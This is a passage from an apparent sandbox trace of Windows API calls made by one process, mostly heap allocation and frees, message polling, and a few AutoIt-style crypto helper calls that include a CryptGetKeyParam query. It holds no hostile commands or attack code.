wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0039.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0039.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0039.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0039.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0039.654] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0039.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0039.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0039.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0039.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0039.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0039.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0039.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0039.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0039.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0039.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0039.655] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0039.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0039.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0039.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3c8 [0039.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0039.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0039.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0039.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0039.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc70 [0039.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0039.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0039.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0039.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0039.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0039.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0039.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0039.655] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0039.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0039.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0039.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0039.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0039.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0039.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0039.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0039.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0039.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0039.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0039.656] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0039.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0039.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0039.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0039.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0039.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0039.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0039.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0039.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0039.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0039.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0039.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0039.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0039.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0039.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0039.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0039.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0039.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.657] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0039.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0039.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0039.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0039.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0039.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0039.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0039.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0039.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0039.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0039.657] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0039.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0039.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0039.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0039.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0039.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.658] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0039.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb68 [0039.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0039.658] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0039.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0039.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0039.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0039.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0039.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0039.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0039.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0039.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0039.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0039.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0039.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0039.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0039.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0039.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0039.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0039.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0039.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0039.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0039.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0039.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0039.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0039.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0039.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0039.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0039.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0039.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0039.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0039.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0039.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0039.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0039.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0039.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0039.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0039.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0039.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0039.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0039.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0039.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0039.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0039.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0039.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0039.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0039.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0039.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0039.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0039.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0039.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0039.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0039.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0039.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0039.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0039.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0039.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0039.661] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0039.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0039.662] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da2f8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2f8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0039.662] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.662] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.662] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.662] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.662] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.662] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.662] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.662] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.662] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0039.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.662] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.662] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0039.662] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.662] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.662] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, 